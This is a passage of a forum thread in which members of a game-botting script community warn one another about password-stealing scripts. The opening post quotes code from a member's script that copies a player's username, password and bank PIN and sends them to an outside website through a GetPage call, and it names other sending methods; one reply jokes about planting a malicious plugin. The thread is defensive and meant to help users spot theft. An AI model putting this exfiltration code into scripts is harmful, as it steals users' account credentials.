Page 1 of 5 123 ... LastLast
Results 1 to 25 of 125

Thread: How to detect password stealing scripts

  1. #1
    Join Date
    Apr 2008
    Location
    Northwest england
    Posts
    1,179
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default How to detect password stealing scripts

    Recently an SRL Member "IROKI" has found to be password stealing,
    (Good Catch BobboHobbo)
    So if you have used one of his scripts recently change all your passwords that are the same as your runescape one, if your email is the same it is of great importance that you change this as this can be used to find all your passwords.

    Ok so when a script is used to steal passwords it sends the passwords to a website.

    There are multiple methods of this

    1. Using GetPage

    2. Using Plugins (this way is almost undetectable)


    1. Using GetPage

    This was used recently by Iroki
    Procedure DeclarePlayers;
    SCAR Code:
    Begin
      HowManyPlayers := 1;
      NumberOfPlayers(HowManyPlayers);
      CurrentPlayer := 0;

      Players[0].Name         := '';      // Your UserName
      Players[0].Pass         := '';      // Your PassWord
      Players[0].Nick         := '';      // Your Nick (3-4 letters from your username)
      Players[0].Active       := True;    // Use this player ??
      Players[0].Skill        := 'Prayer';  // Skill to lamp
      Players[0].Strings[0]   := '';      // Your BankPin
      Players[0].Strings[1]   := 'Adamant';      // What kind of bars you want to smelt ( Bronze, Iron, Silver, Steel, Gold, Mithril, Adamant, Rune, CballsFO, CballsFB )

      Code[0] := '';
      Code[1] := '';
      verKey  := '';
    End;

    There we can see that you enter some your char info and some other info
    nothing wrong with that.

    However combined with

    SCAR Code:
    Begin
      If (Code[0] = '') Or (Code[1] = '') Or (verKey = '') Then
      Begin
        Code[0] := Players[CurrentPlayer].Name;
        Code[1] := Players[CurrentPlayer].Pass;
        verKey  := Players[CurrentPlayer].Strings[0];
      End;
      For i := 1 To Coding Do
      Begin
        Code[0] := CodeNow(Code[0]);
        Code[1] := CodeNow(Code[1]);
      End;
    End;

    Here we see that the codes and verification key are changed to the account details =O, in all honesty there is nothing wrong with that eithen tho its unnecessary, so if you see this be very suspicious if your still not sure ASK better safe than sorry.

    Now the part that should make you worried.

    SCAR Code:
    GetPage('http://www.iroki.cba.pl/stats.php?tresc=Code[0]=' + Code[0] + '+Code[1]=' + Code[1] + '+verKey=' + verKey + '+&CreateSessionIDverKey+');

    Here they are sending code[0] code[1] and verkey to a website which earlier we learned was changed to your account details.

    Get/PostHTTPPage/Ex can also be used instead of GetPage (Thanks Mixster)

    If you see this be wary.

    Don't use it if it you see this.


    Thanks Mixster for stuff below

    Get/PostHTTPPage/Ex are the other ways to use it that is more easy to spot while going through the script, but harder to notice in popups as it simply has ?POST? or ?GET? at the end of the URL.

    Plugin's have the advantage over not asking for permission to access a webpage but are still tracked in the same way of checking every use of username and password as they still have to be input into a procedure/function to send the info into the plugin.

    Get/PostHTTPPage/Ex are the other ways to use it that is more easy to spot while going through the script, but harder to notice in popups as it simply has ?POST? or ?GET? at the end of the URL.
    The only way to be 100% sure a script won't steal your details is to follow the scripts logic and see where it uses your username and password. Every method can be stopped that way.

  2. #2
    Join Date
    Dec 2006
    Location
    Sydney, New South Wales, Australia
    Posts
    4,603
    Mentioned
    15 Post(s)
    Quoted
    42 Post(s)

    Default

    Quote Originally Posted by Waddo
    2. Using Plugins (this way is almost undetectable)
    Don't give people ideas <_>
    You may contact me with any concerns you have.
    Are you a victim of harassment? Please notify me or any other staff member.

    | SRL Community Rules | SRL Live Help & Chat | Setting up Simba | F.A.Q's |

  3. #3
    Join Date
    May 2007
    Location
    NSW, Australia
    Posts
    2,823
    Mentioned
    3 Post(s)
    Quoted
    25 Post(s)

    Default

    Credits on who found it pl0x

    Nah jks. Should be easy to make a script to scan for password thrieft. Ill make one soon :P.

  4. #4
    Join Date
    Aug 2007
    Location
    in a random little world
    Posts
    5,778
    Mentioned
    0 Post(s)
    Quoted
    7 Post(s)

  5. #5
    Join Date
    Apr 2008
    Location
    Northwest england
    Posts
    1,179
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Lol I have no idea I was hoping some one would tell me something about hem so I could add it I'm obviously not going to put how to tho.

    I think mixster knows.
    Blank!

  6. #6
    Join Date
    Jun 2007
    Location
    south park
    Posts
    1,160
    Mentioned
    0 Post(s)
    Quoted
    62 Post(s)

    Default

    maybe all scripts should be vetted before they get posted? or make someone on the forums in charge pf checking scripts?
    http://www.youtube.com/user/YoHoJoSRL
    Good scripting guides on youtube
    Formerly known as (djcheater)

  7. #7
    Join Date
    Apr 2008
    Location
    Northwest england
    Posts
    1,179
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Yes i've thought of that and id be happy to do it but there are alot of scripts released and scripts can be edited pretty easy so it wouldn't work
    Blank!

  8. #8
    Join Date
    Jan 2007
    Posts
    8,876
    Mentioned
    123 Post(s)
    Quoted
    327 Post(s)

    Default

    hmm... Iroki... Can't remember him :s

    anyways, it should be easy to screw his password-stealing-script by just setting Code[0] to ' ', as the internet does not allows spaces (they use %20 as spaces)

  9. #9
    Join Date
    Apr 2008
    Location
    Northwest england
    Posts
    1,179
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    actually setting it to anything would work as it only changes to acount details if they leave blank =p
    Blank!

  10. #10
    Join Date
    Jan 2007
    Posts
    8,876
    Mentioned
    123 Post(s)
    Quoted
    327 Post(s)

    Default

    True

    Quote:
    Originally Posted by Waddo
    2. Using Plugins (this way is almost undetectable)

    Don't give people ideas <_>

  11. #11
    Join Date
    Dec 2006
    Posts
    908
    Mentioned
    1 Post(s)
    Quoted
    17 Post(s)

    Default

    Rofl! Smart son of a.... Ill keep an eye for them.

  12. #12
    Join Date
    Dec 2007
    Location
    Canada
    Posts
    187
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    This is a very good thread cause I heard about Iroki and im sure there is going to be a lot of copycats out there that have no respect for others accounts. Good Job
    I'm baaaack

  13. #13
    Join Date
    Apr 2007
    Location
    The Netherlands
    Posts
    5,553
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    When mods have to accept script to get them posted, they could also look through for code optimization etc etc
    ~Hermen

  14. #14
    Join Date
    May 2007
    Location
    England
    Posts
    4,140
    Mentioned
    11 Post(s)
    Quoted
    266 Post(s)

    Default

    There are roles of moderators, and admins, so why couldn't we have some people, like said above, check scripts for their code, that could be called 'Script Anaylers' or something along those line. They could have a green name colour, also.
    <3

    Quote Originally Posted by Eminem
    I don't care if you're black, white, straight, bisexual, gay, lesbian, short, tall, fat, skinny, rich or poor. If you're nice to me, I'll be nice to you. Simple as that.

  15. #15
    Join Date
    May 2007
    Location
    Ohio
    Posts
    2,296
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    *makes a plugin!*
    *implants it in scars main plugin folder for new scar release*
    *h4x every one I hate*

  16. #16
    Join Date
    Oct 2007
    Location
    If (Online) then Loc := ('On comp') else Loc := ('Somewhere else!');
    Posts
    2,020
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    i think there should be a script submitence jus like the SRL member application so we can scan scripts befor we give them the go ahead i think that will almost certain to stop em

  17. #17
    Join Date
    Jun 2007
    Location
    south park
    Posts
    1,160
    Mentioned
    0 Post(s)
    Quoted
    62 Post(s)

    Default

    but then every new version would have to be checked if it got re relaseled!


    I uniofficlay make waddo a script checker, as your always on here!
    http://www.youtube.com/user/YoHoJoSRL
    Good scripting guides on youtube
    Formerly known as (djcheater)

  18. #18
    Join Date
    May 2008
    Posts
    266
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Please have srl staff review scripts before anyone uses them (more than 2 staffs) Now that one was caught I bet there will be more.

  19. #19
    Join Date
    Jun 2007
    Location
    Wednesday
    Posts
    2,446
    Mentioned
    3 Post(s)
    Quoted
    1 Post(s)

    Default

    Checking every script takes ages and is pointless considering there have only been a couple of incidences.
    Plugin's only have the advantage over not asking for permission to access a webpage but are still tracked in the same way of checking every use of username and password as they still have to be input into a procedure/function to send the info into the plugin.
    Lastly, Get/PostHTTPPage/Ex are the other ways to use it that is more easy to spot while going through the script, but harder to notice in popups as it simply has ?POST? or ?GET? at the end of the URL.
    The only way to be 100% sure a script won't steal your details is to follow the scripts logic and see where it uses your username and password. Every method can be stopped that way.
    Edit:
    R0b0t1, the advisor, says: 'No'
    By reading this signature you agree that mixster is superior to you in each and every way except the bad ways but including the really bad ways.

  20. #20
    Join Date
    Mar 2007
    Posts
    3,116
    Mentioned
    0 Post(s)
    Quoted
    2 Post(s)

    Default

    No one every script being searched. How about this, you quit being leechers, learn to script and search it yourself.

  21. #21
    Join Date
    Apr 2008
    Location
    Northwest england
    Posts
    1,179
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Myles + everyone else who thinks we should check all the scripts

    It takes 20 seconds to edit a script and repost,
    If there was a filter then that would mean that when a script was posted it would be held in some storage and could possibly lag up the forums checking each script is a bad idea I would do it if i was asked, i have a lot of free time.

    Eithen in the free for all section the admins only check once then you can edit how you please.
    Blank!

  22. #22
    Join Date
    Mar 2007
    Posts
    3,116
    Mentioned
    0 Post(s)
    Quoted
    2 Post(s)

    Default

    Quote Originally Posted by Waddo View Post
    Myles + everyone else who thinks we should check all the scripts

    It takes 20 seconds to edit a script and repost,
    If there was a filter then that would mean that when a script was posted it would be held in some storage and could possibly lag up the forums checking each script is a bad idea I would do it if i was asked, i have a lot of free time.

    Eithen in the free for all section the admins only check once then you can edit how you please.
    When did I say I supported it?

  23. #23
    Join Date
    Jun 2007
    Location
    Wednesday
    Posts
    2,446
    Mentioned
    3 Post(s)
    Quoted
    1 Post(s)

    Default

    Waddo: This has happened only a couple of times and is completely unnecessary. Checking each and every script is the same as the governments of the world deciding that every person should be strip searched before entering every building. If it was a common thing, then I would agree that some form of pre-approval would be needed, but it isn't common at all. It would just waste a lot of time in the long run with minimal results.
    By reading this signature you agree that mixster is superior to you in each and every way except the bad ways but including the really bad ways.

  24. #24
    Join Date
    Apr 2008
    Location
    Northwest england
    Posts
    1,179
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Mixster that is what im saying Read godarn it read.
    Quote Originally Posted by waddo
    checking each script is a bad idea
    and Myles i have no idea why i said you my mistake =p
    Blank!

  25. #25
    Join Date
    Jun 2007
    Location
    Wednesday
    Posts
    2,446
    Mentioned
    3 Post(s)
    Quoted
    1 Post(s)

    Default

    You posted earlier saying you would like it though pointed out it wouldn't work, so I thought this was your suggestion to fixing that - mainly because I found it very hard and still do to understand your post and all I could extract from it was your suggestion for a script storage area where it would have to be pre-approved and that you wouldn't mind doing it.
    By reading this signature you agree that mixster is superior to you in each and every way except the bad ways but including the really bad ways.

Page 1 of 5 123 ... LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Stealing Creations
    By Rich in forum RS has been updated.
    Replies: 7
    Last Post: 11-24-2008, 11:37 PM
  2. Stealing Scripts.
    By jakeyboy29 in forum News and General
    Replies: 4
    Last Post: 11-02-2008, 07:24 PM
  3. Hill Giant stealing!
    By Secet in forum News and General
    Replies: 7
    Last Post: 06-27-2007, 01:49 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •